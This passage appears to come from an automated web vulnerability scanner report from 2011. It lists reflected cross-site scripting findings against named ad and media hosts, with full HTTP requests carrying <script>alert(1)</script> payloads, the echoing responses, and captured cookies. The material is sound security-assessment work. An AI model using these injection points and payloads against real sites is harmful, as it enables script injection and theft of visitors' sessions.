P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 518

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=38838&type=mrectbaa54"-alert(1)-"50e4220934d&clicktrack=http%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJwVjDsOhDAMBa.CXBPJH2ITbpMQKlCo0BYr7o5deUZ6nj.IwDZxWQvPEwi7EBuSupELkB7c1t7T
...[SNIP]...

1.207. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload cf4c0<script>alert(1)</script>41644a951f0 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=H07710cf4c0<script>alert(1)</script>41644a951f0 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=1a484aca566591c53c93394519ccf266; rsiPus_0="MLsXrEEucT5zIBH3Qpx+rOCHV9wTIf62V307nImZlEBw76YpcfzcZFr0RWvrtRsL1Wr8YdprMhhJd15eFUYGqJstP2duQv8PkdiB0lhkBml9ADYHA1ooiLCxxE4ZbZ6dBJlUHDgyYQ0dWGNgk2mU/6IWZPFutmXvjkfCaZ8XNFt00xjNbdPTO5Zy3pjFEXPPiN9sqakOxmiPznF2pe+333CVmVWtapVbuhz0jSjKWdMeE2eBsBSvtYkc0fmomYLtyi+Lts1umyzd9z/SrKTmNmTnFBMFArLCfjigahHLEoWhBrWvrSf8IrxyRfMTPFuk5iOzQgPN/kcU9HlxpNtUXKVd6mKr30sFlylIwkI9VjAWygBVrOHtwrSI7YvNNUqNCBU5c3lYOKS3+UBPVKDwLi0H3JXAmFxwbNP3r+5Rck+Pdm9kW/4="; NETSEGS_K05540=3161248fde72e26b&K05540&0&4da1a7e9&0&&4d7c48a5&0383df689f9c2c8ede3ba30f48f38e86; NETSEGS_J08778=3161248fde72e26b&J08778&0&4da1a841&3&10062,10068,50003&4d7c24ae&0383df689f9c2c8ede3ba30f48f38e86; rsi_segs_1000000=pUPF5E+huXIQT7uItGF29/wofum2uvdrOtqhLFjosdn5vw/Z0o0sxA4vKqbOnQTLW4cCk+FE692ypYwycfjr6pQLrskt2ZksNcwT83aO9vuodXCBAXGgYWukHXiWm5SE3AKLPqdHNv4P7/HjAwfO1DE/sKeziHPOe2QNivJ0aYWUKtqHM646GVNpI/wBQwsZF+8WSIF04FaDFdWWKAcirrGRiiJasOa88gL2rHD0uPWvxZUesNXvoB2n9lZdjZKvY6+bssnep9IdeKCg/owzXSsBV+zCKgxPlmdIb6FeUzM/9htM9LLLSk5Y/2Cv4K9NJB7UwLLxOc2vRuXiuMLm2APpyZtdBKhU6JutCGGy8AJzjeNcP8F4IfjPM9UGEwmMCUasfUR8FMOdWxAHKsHAPwzjrGo2CXjfVwVFCdiseXz0mJjQXWegDIhz1azijzbKN5hfhRCLTDkgkk5YF8sGuhxn0+muokbyBbRK/FfYEDVdGPozdaoRNW2bBBlz/a1GiGoplstK0X5IuDPjE5ko/PZfhhnPXo/7g5NYiKU=; rtc_5xfh=MLsP94EKIQpn5xKpuJug7EO6wWzz3PnFAZvwggKUlVfSpVSmay94JFWI77GBS4sX3fXdqj8BzOE0NvejueToqXBIHm546O02acCOAQJycIQn42luIzOl8pjRH7pfWY76Vfpcpxa686qeewew32MbhWus7gdp6v0Ab93tDAWFOfkz3ccvNK3Rfqc7c8yjTs+Lq+bNX7Yd7mf2osIKD401Q3qDUdc2o8m7NZ8zWdD1cdycxBUqHv5v5UlzVw50hRlnWgOevcbhBiASknSZzZGWUw2qBJkb0qoqoSdjKYuF7kOjQ8dCYyOWzLAG+ZVN0IOFhWRwWH7/7PJij9YYK6i2aChY6nJXx/gweUQnZEuYEcSzZQi+qdpPuwFE6iZomOdehQ2BfxG/V9wS5l3ZKJ9rqmgiHjfJFmWjXBhJd9UDp8ERPnz3D/IUnQJarG6rfEvO/0q0K0riZ5tElcx16wvcoEI4wSKEbnN8nmPQ0HqIVYZaYBXYTX2NOALbbJOSLdy+q+WP5pBuAtgbQY3PgCz8RWfSUUzUf7joEMGVdPyjDzxCL9wRi+0bZOz7hlUEq33wU0mV5Aar6hW2hfmxaE6f7VXebReoMkDPFA59pvxdZMmDUvslWLYUwWBUYSpb3/fRfyhJaLv3oslDHNxErX+rsXv2hbmq0SK/6Xpa1uO7q1wpkti4Kxu1Set716APaT8MOIq6MLZm42P5IK8/9/+pBMSeSpXDjnzv0Urz6A8nmJUCQNQ8Q/O9S7CU1hUr0h9+S5jxcokOIoe9/uIIq2CesVtZZ5xnCbjl3rzvdwtikTTB+naLDw8E+ZnhJHC11LXnnK/QiJms/mjXtz+qQeMcW4nCoCKcTrXW/41kzmvalyb97g7P3+Txd9XI0rxHBBINLhLBavPFUvXTz7J/BLCHzaUejKnPQxmF8MUdS7OgGxpdx1UovHQerrHynnbdbbu8zbuWsfklysmOulBYu8NGhAQ38/ksPnx4BTwit91gwdb7jwLRXVnMNfvHQoQbm8hZsv0UzN6Bhv99C1Va8EubORO5kWHNkEqSXEuAjs6iS0bCvE45b/y+VYcUl/MdqnElW4ZYDjirtl21dPqfLYZ2gVsQrUe/pKMldPmkvkQVOvoMpxXF0bNftj90jI9Rko7FYhTizMFWjYkdYSC749ENYAhnTslx0jk2qjQOE61hR+Ss7ssLX9U03hOPq/pnoyFUpuo4hYfss6+JoIVjQC3vIbyzjNhvmHNAD3F93ycfIIJLwGSzxYV4th59yHathOe0jrhx4VcbkNYQJHSdqrwZknt7oVKw7fjlqAmULHwPHiMPzNuu27HEppZnxmoJwDrL4HdkRfQwR8+18bsupZ/OLYxAT1wVGFr407X55RaqL+0W3mz96uSE; NETSEGS_J08781=3161248fde72e26b&J08781&0&4da8f208&0&&4d82e440&0383df689f9c2c8ede3ba30f48f38e86; udm_0=MLvvNSMJaSpn3g1FgeeeGz9kVblCZvQuz8C2Lue5RuIgntk2+vDydfM3Qvav5s5BXEH7WYwcF1GWSuZqoG9BkqvyM4tvbC7PkDFIZgoRiGQG3QDHCWD9knXnLihiUNN/kh+SsFKIsei7HtCqSFudrufRMerp+XValq2Udi0TAX22Pv3xf/KpLtyssZyaIo+bk1LvwuNPguCfAegR2Nm7NR8Kx0L/yrcUdwRAjlY76oOCm/OE1b7LkOPEHZr1NTJwIfAKpFCcOspzdMyO3tuuSTycjSlh7qIcY3NYe7JdQSuC4fk76XU0oeZ8/62MNRzcHlDyN1QWUqXaDxYBV/+bQZJ/PbGi9QzYA75whNc5Kl3BkNGo6Kix6p1UkghSGSGoP9VAvappN8/nHvQBA3UTlTui+5eF873rZ4Gu0BW7DJnQiyFepB6HsD4tQ55G3wlSLUN4ZWlnD/90UC3K2e9iFyzGlOgmI8ZQzoE7ruv2zSsKWkpSSRpc24m00svu8DgnMe43XjwUL233fuppjj3LN5KxRt36jtmgifbA2x5YCevxqcCiAvPi0MY7nXbTDNvcEKdRsLJA8dDr0V0nLeW4z7ejElsD363dsxrVOmp58bJt0JFziWuqbaFSwiVy5Fv6iCKaO/B+2DAN8kvhz6l7SMEQkEGFLNaUNbRPjckYzK1Ia4cempM2TZHNdixRPuLXla455Jb78WBBBLJkK1L4+xJqf4ZTk8KV7KuRkx26BAPyE+361VPd4DO4geH1UIicIGedc0m38A2i/ZIv4TxJCFILkQnuH5AxRrTmVBcB3SQ9o2Ou6pvuYwtX3m/PzlkjJYeWdyZ08aBnwmfwyzvABb3u8lUDkE4kDuoFruVisbgyujzu7EuuFNJlFljGZhgEkfaiKmq9qKSSBLp9x67f3T446jAqNZfXUkuCZ1s+BX+GKZQsxipL/1Q9KLrCK4UXm7QOU6wezNic4W254UpprtBMhGijPn1ZBtXr4RzV0y+jSBq03PYSmeo6GiE0ypCMbmLuk/+a2AXeFKy6EveuNaKXx/TF4QITaawqPB/YfXbWw+1vSb3PN8+920H9GmbH/X5T/54CnbRv8/NhQOGpAsk9SWDl4XP6Oj/ErfNLErb2lYq93z4cjCWvS2eHR8G8/JyAzp+5icX5MuIVUpYj0UNlU235ygHHlKGTKA1H1E9jJnRUMcKrZEUagulJ0TJNrEar3o3bgKc=; rsi_us_1000000=pUMd4i1HORYY7FyEch7OjA++tx5gmANDoci8Ngam3eErSbuvJUrHi5qQyC1z6GKpW9P8oQFpBYyJv36o53ZsQtkWLtboNjZjHYDhpW6jtbfwTJ0qVCd0/r6zybESup5rlfORPFt52QDprRauTFLfiRpMeCEvghYPwetoIWO/dxfiorwpoAAFUFFUkJkrWGQqn40W/Ss68+/prp/q1B29XFarjffD4Sk8SnlDrFhFVtklBH8OoTIjGrcH99WPiH8Rp15yL1/O4hHmwCONo6z5r0FeIGRsf0NRCmSVH6Oe0k1ivZ3hQLPFZWfibWRPIYsjeFWB5zF61J1nlGZS/yN7Nr7l0T41YmEI5WD1+JcedDtM8k9UZz0rOHoSIXLHBe/GZntDMI2hLCQn+DfWqkluncUynmKINYWi6BNK5AU0nmG6k9FlO+c50lH48m0lviD1BVAkBSz7lFiPO/rdMmkgHzPJ3iptjQcDQxaqwozvh4s2avZ133WUAGNtixW+Z8VGWdx9ZdL1ClvKNuTW2RizbhkUlcOUi7Ydv4CJQHCl1FFS0y7m4dcgismYCyvOA2YT+l48T65E6pX1nqjDD3rtphk7Kf386eZR3EOcV/jA6j+h7Pq1in1xW99ysVk7m08ukiAgYBkpmoCJfNMdo3j4A43J5+atGYQDLD4JGLCihatzx8RdZkJ4BeI+HmqD3lrw5e0IIdNJf0S8cNF5GXkX6T/GhDr7AN8+Vbsb620XM/aKtXHWZCtldTuGl2hcaDd/cZUmKIQQECNfJWEWfZ5WPJXYnFjKqIdEUlC3Ia9Xr82/zp4gS2/BmUvQlYRhM7Q02OvD+u/IojVHFy8y/wmFI0DHFhmwTOFIgbj8fKk4YmD0TetvB6IAedaZlpCsaxYGEAEn4ja8UFGjyfqy3JCWuGD1pEWOgIj0QYf6W827ISyUP5TIuuhHlf/wlTOTY0kOUHRD5YLTJJ5XVadshi4RC1afWZaFii3Iwn7yeeCYoTaVfL88Ytv+jeIjaUqw9pbeFsS2SxdEnmUxwJ3EaRyAFVLSt3CHiKk/4t/cZq5KQWGkPZgXmKxQZSyA0um+5RHbwrNa18l3EJTnJ2Duq3LSibmzktn19WnwIFYL34y2qiPFC7G/wQYYNri5+VQ5rMRozIviH82lg20AII9HKU/lBZEuinMID+YpMoFPQJY4R8HhME+5tGpmbEjMdzYS1fuf58S2QA9k5FVTP2VyNkPvS8kUKPoPxE4Z9tuR05WHRROttWFV8PZrFQyJGNBXuPcy5vaVDr+rWdFWTlDRRY+5EhBROXTU4O9UkpwkSGIIAsrcOXDLUnX8mmX49CZWAZrOJuDTgFl8ug6hWS+QZreBiLqDMdciFt5DpAdiwVyAURyPs4vh3jNi/cHEWfaMuAqo/66mx3YoqkxooXpUmdRQHtsHj+6Yqo6iwkA+Do7OgTEKv7+THDE2Jcz5P/IxDreFbqZwg9Gb4+YTYscROiKJ/cJlQk/ZApmglg6EtUNKQ38ERphwtLFVs9zsdF8Wj/JZna1HEjNPweZNxKvgdw9MUkJ95m78+h3fsvvVPSFQycRAyqxTaKlMUQqASbZrodUHmxH5if8OdO+xdj2hsMOtsEww4NgfUdIOOCYwNrhX4Ej6ZuJJZXXLtU3RHAeQosqyvUjdgXQwEFMgUTP2piMOT2C0fe8SOQlTKLgDfeenITiHbWU4VfokA3OVhw==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 23 Mar 2011 19:39:26 GMT
Cache-Control: max-age=86400, private
Expires: Thu, 24 Mar 2011 19:39:26 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 23 Mar 2011 19:39:26 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "H07710CF4C0<SCRIPT>ALERT(1)</SCRIPT>41644A951F0" was not recognized.
*/

1.208. http://mbox12e.offermatica.com/m2/tmobile/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mbox12e.offermatica.com
Path:   /m2/tmobile/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload a616e<script>alert(1)</script>0b99d93bd33 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/tmobile/mbox/standard?mboxHost=www.t-mobile.com&mboxSession=1300833028182-172718&mboxPC=1300624507874-511379.17&mboxPage=1300833028182-172718&mboxCount=1&mbox=tmobile_globala616e<script>alert(1)</script>0b99d93bd33&mboxId=0&mboxURL=http%3A%2F%2Fwww.t-mobile.com%2Fshop%2Fphones%2F&mboxReferrer=http%3A%2F%2Fburp%2Fshow%2F12&mboxVersion=34 HTTP/1.1
Host: mbox12e.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.t-mobile.com/shop/phones/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 136
Date: Tue, 22 Mar 2011 22:30:52 GMT
Server: Test & Target

mboxFactories.get('default').get('tmobile_globala616e<script>alert(1)</script>0b99d93bd33',0).setOffer(new mboxOfferDefault()).loaded();

1.209. http://media.match.com/iframe [@CPSC@ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.match.com
Path:   /iframe

Issue detail

The value of the @CPSC@ request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34784"><script>alert(1)</script>b0543cfa2b4 was submitted in the @CPSC@ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe?spacedesc=2121888_1083487_728x90_1226306_2121888&target=_blank&@CPSC@=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/3/0/%2a/p%3B236938802%3B0-0%3B1%3B42938746%3B3454-728/90%3B40712866/40730653/1%3B%3B%7Eaopt%3D2/0/3e00ff/0%3B%7Esscs%3D%3f34784"><script>alert(1)</script>b0543cfa2b4 HTTP/1.1
Host: media.match.com
Proxy-Connection: keep-alive
Referer: http://yahoo.match.com/search/searchSubmit.aspx?by=radius&lid=226&cl=1&gc=1&tr=2&lage=25&uage=35&ua=35&dist=20&po=1&oln=0&do=2&q=man,women,25,35&st=quicksearch&pn=1&rn=4
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dMatch=CCount=1&CDate=3/22/2011; __utmz=191932533.1300827941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ppLoginReferer=http%3a%2f%2fyahoo.match.com%2fLogin%2fLinkedAccountsPassportReturn.aspx; dMatchSearchROF=ROF01=&ROF05=&ROF02=&ROF04=&ROF03=United States&ROF06=; dMatchSearch=SC01=1&SC02=2&SC07=&SC08=&SC04=35&SC13=0&SC14=0&SC09=1&SC12=region; __utma=191932533.1516891893.1300827941.1300827941.1300827941.1; __utmc=191932533; __utmb=191932533.10.10.1300827941

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 21:34:27 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=11-612909186; expires=Mon, 22 Mar 2021 09:34:27 GMT; path=/; domain=.match.com
Set-Cookie: CSList=1088050/1083487,0/0,0/0,0/0,0/0; expires=Mon, 20 Jun 2011 21:34:27 GMT; path=/; domain=.match.com
Content-Type: text/html
Content-Length: 783
Connection: close

<HTML>
<HEAD>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
</HEAD>
<BODY>
<A HREF="http://media.match.com/click.ng?spacedesc=2121888_1083487_728x90_1226306_2121888&af=1110302&ml_pkgkw=-%253A%25
...[SNIP]...
mp=1088050&ml_crid=2121933&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/3/0/%2a/p%3B236938802%3B0-0%3B1%3B42938746%3B3454-728/90%3B40712866/40730653/1%3B%3B%7Eaopt%3D2/0/3e00ff/0%3B%7Esscs%3D%3f34784"><script>alert(1)</script>b0543cfa2b4http://www.match.com/brands/chemistry.aspx?s=5&TrackingID=2000955&sourceid=1088050_1083487_1226306_2121888_1110302_2121933_728x90" TARGET="_blank">
...[SNIP]...

1.210. http://media.match.com/iframe [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.match.com
Path:   /iframe

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c9b6"><script>alert(1)</script>5ae855d3b0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe?spacedesc=2121888_1083487_728x90_1226306_2121888&target=_blank&@CPSC@=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/3/0/%2a/p%3B236938802%3B0-0%3B1%3B42938746%3B3454-728/90%3B40712866/40730653/1%3B%3B%7Eaopt%3D2/0/3e00ff/0%3B%7Esscs%3D%3f&5c9b6"><script>alert(1)</script>5ae855d3b0a=1 HTTP/1.1
Host: media.match.com
Proxy-Connection: keep-alive
Referer: http://yahoo.match.com/search/searchSubmit.aspx?by=radius&lid=226&cl=1&gc=1&tr=2&lage=25&uage=35&ua=35&dist=20&po=1&oln=0&do=2&q=man,women,25,35&st=quicksearch&pn=1&rn=4
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dMatch=CCount=1&CDate=3/22/2011; __utmz=191932533.1300827941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ppLoginReferer=http%3a%2f%2fyahoo.match.com%2fLogin%2fLinkedAccountsPassportReturn.aspx; dMatchSearchROF=ROF01=&ROF05=&ROF02=&ROF04=&ROF03=United States&ROF06=; dMatchSearch=SC01=1&SC02=2&SC07=&SC08=&SC04=35&SC13=0&SC14=0&SC09=1&SC12=region; __utma=191932533.1516891893.1300827941.1300827941.1300827941.1; __utmc=191932533; __utmb=191932533.10.10.1300827941

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 21:34:47 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=13-541182733; expires=Mon, 22 Mar 2021 09:34:47 GMT; path=/; domain=.match.com
Set-Cookie: CSList=1088050/1083487,0/0,0/0,0/0,0/0; expires=Mon, 20 Jun 2011 21:34:47 GMT; path=/; domain=.match.com
Content-Type: text/html
Content-Length: 823
Connection: close

<HTML>
<HEAD>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
</HEAD>
<BODY>
<A HREF="http://media.match.com/click.ng?spacedesc=2121888_1083487_728x90_1226306_2121888&af=1110302&ml_pkgkw=-%253A%25
...[SNIP]...
p=1088050&ml_crid=2124088&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/3/0/%2a/p%3B236938802%3B0-0%3B1%3B42938746%3B3454-728/90%3B40712866/40730653/1%3B%3B%7Eaopt%3D2/0/3e00ff/0%3B%7Esscs%3D%3f&5c9b6"><script>alert(1)</script>5ae855d3b0a=1http://www.match.com/brands/chemistry.aspx?s=5&TrackingID=2000955&sourceid=1088050_1083487_1226306_2121888_1110302_2124088_728x90" TARGET="_blank">
...[SNIP]...

1.211. http://media.match.com/iframe [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.match.com
Path:   /iframe

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4837c"><script>alert(1)</script>6569d8e2df9 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe?spacedesc=2121888_1083487_728x90_1226306_2121888&target=_blank4837c"><script>alert(1)</script>6569d8e2df9&@CPSC@=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/3/0/%2a/p%3B236938802%3B0-0%3B1%3B42938746%3B3454-728/90%3B40712866/40730653/1%3B%3B%7Eaopt%3D2/0/3e00ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: media.match.com
Proxy-Connection: keep-alive
Referer: http://yahoo.match.com/search/searchSubmit.aspx?by=radius&lid=226&cl=1&gc=1&tr=2&lage=25&uage=35&ua=35&dist=20&po=1&oln=0&do=2&q=man,women,25,35&st=quicksearch&pn=1&rn=4
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dMatch=CCount=1&CDate=3/22/2011; __utmz=191932533.1300827941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ppLoginReferer=http%3a%2f%2fyahoo.match.com%2fLogin%2fLinkedAccountsPassportReturn.aspx; dMatchSearchROF=ROF01=&ROF05=&ROF02=&ROF04=&ROF03=United States&ROF06=; dMatchSearch=SC01=1&SC02=2&SC07=&SC08=&SC04=35&SC13=0&SC14=0&SC09=1&SC12=region; __utma=191932533.1516891893.1300827941.1300827941.1300827941.1; __utmc=191932533; __utmb=191932533.10.10.1300827941

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 21:34:09 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.match.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=11-612908996; expires=Mon, 22 Mar 2021 09:34:09 GMT; path=/; domain=.match.com
Set-Cookie: CSList=1088050/1083487,0/0,0/0,0/0,0/0; expires=Mon, 20 Jun 2011 21:34:09 GMT; path=/; domain=.match.com
Content-Type: text/html
Content-Length: 783
Connection: close

<HTML>
<HEAD>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
</HEAD>
<BODY>
<A HREF="http://media.match.com/click.ng?spacedesc=2121888_1083487_728x90_1226306_2121888&af=1110302&ml_pkgkw=-%253A%25
...[SNIP]...
6/40730653/1%3B%3B%7Eaopt%3D2/0/3e00ff/0%3B%7Esscs%3D%3fhttp://www.match.com/brands/chemistry.aspx?s=5&TrackingID=2000955&sourceid=1088050_1083487_1226306_2121888_1110302_2121933_728x90" TARGET="_blank4837c"><script>alert(1)</script>6569d8e2df9">
...[SNIP]...

1.212. http://metaframe.digitalsmiths.tv/v1/tmzcompany/playlists/mostrecent [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metaframe.digitalsmiths.tv
Path:   /v1/tmzcompany/playlists/mostrecent

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload bcb4a--><script>alert(1)</script>426bfcbe534 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1bcb4a--><script>alert(1)</script>426bfcbe534/tmzcompany/playlists/mostrecent?format=json HTTP/1.1
Host: metaframe.digitalsmiths.tv
Proxy-Connection: keep-alive
Referer: http://tmz.vo.llnwd.net/o28/player/rightrail/playlist.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
X-Varnish: 579499436
Vary: Accept-Encoding
Cache-Control: max-age=5
Date: Tue, 22 Mar 2011 22:05:44 GMT
Connection: close
Content-Length: 729

<html>
<head><title>Not Found</title></head>
<body>
<h1>Not Found</h1>
<p>The resource could not be found.
<br/>/v1bcb4a--&gt;&lt;script&gt;alert(1)&lt;/script&gt;426bfcbe534/tmzcompa
...[SNIP]...
,
(None, '/v1/extratvcompany'),
(None, '/v1/judgejpcompany'),
(None, '/v1/ellencompany'),
(None, '/v1/lopeztonight'),
(None, '/v1/tmzcompany'),
(None, '/v2')
SCRIPT_NAME: ''
PATH_INFO: '/v1bcb4a--><script>alert(1)</script>426bfcbe534/tmzcompany/playlists/mostrecent'
HTTP_HOST: 'mds_paste' -->
...[SNIP]...

1.213. http://metaframe.digitalsmiths.tv/v1/tmzcompany/playlists/mostrecent [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metaframe.digitalsmiths.tv
Path:   /v1/tmzcompany/playlists/mostrecent

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload b47ef--><script>alert(1)</script>979a162cabe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/tmzcompanyb47ef--><script>alert(1)</script>979a162cabe/playlists/mostrecent?format=json HTTP/1.1
Host: metaframe.digitalsmiths.tv
Proxy-Connection: keep-alive
Referer: http://tmz.vo.llnwd.net/o28/player/rightrail/playlist.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
X-Varnish: 579499442
Vary: Accept-Encoding
Cache-Control: max-age=5
Date: Tue, 22 Mar 2011 22:05:45 GMT
Connection: close
Content-Length: 729

<html>
<head><title>Not Found</title></head>
<body>
<h1>Not Found</h1>
<p>The resource could not be found.
<br/>/v1/tmzcompanyb47ef--&gt;&lt;script&gt;alert(1)&lt;/script&gt;979a162ca
...[SNIP]...
'/v1/extratvcompany'),
(None, '/v1/judgejpcompany'),
(None, '/v1/ellencompany'),
(None, '/v1/lopeztonight'),
(None, '/v1/tmzcompany'),
(None, '/v2')
SCRIPT_NAME: ''
PATH_INFO: '/v1/tmzcompanyb47ef--><script>alert(1)</script>979a162cabe/playlists/mostrecent'
HTTP_HOST: 'mds_paste' -->
...[SNIP]...

1.214. http://metaframe.digitalsmiths.tv/v1/tmzcompany/playlists/mostrecent [format parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metaframe.digitalsmiths.tv
Path:   /v1/tmzcompany/playlists/mostrecent

Issue detail

The value of the format request parameter is copied into the HTML document as plain text between tags. The payload fa94c<script>alert(1)</script>c7216a771a6 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/tmzcompany/playlists/mostrecent?format=jsonfa94c<script>alert(1)</script>c7216a771a6 HTTP/1.1
Host: metaframe.digitalsmiths.tv
Proxy-Connection: keep-alive
Referer: http://tmz.vo.llnwd.net/o28/player/rightrail/playlist.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
